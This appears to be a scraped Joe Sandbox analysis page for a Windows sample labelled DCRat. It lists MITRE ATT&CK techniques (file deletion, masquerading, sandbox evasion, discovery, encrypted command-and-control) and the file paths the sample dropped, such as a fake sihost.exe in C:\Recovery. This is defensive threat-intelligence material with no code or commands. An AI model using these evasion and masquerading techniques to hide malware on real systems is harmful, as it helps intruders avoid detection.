Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0J5DzstGPi.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Mozilla Firefox\17c9f4d4cfaa6e

C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe

C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe:Zone.Identifier

C:\Recovery\17c9f4d4cfaa6e

C:\Recovery\66fc9ff0ee96c2

C:\Recovery\sihost.exe

C:\Recovery\sihost.exe:Zone.Identifier

C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe

C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe:Zone.Identifier

C:\Users\Default\17c9f4d4cfaa6e

C:\Users\Default\steBCuuQsIefcKufvgYbRBCxKhPR.exe

Windows Analysis Report
0J5DzstGPi.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre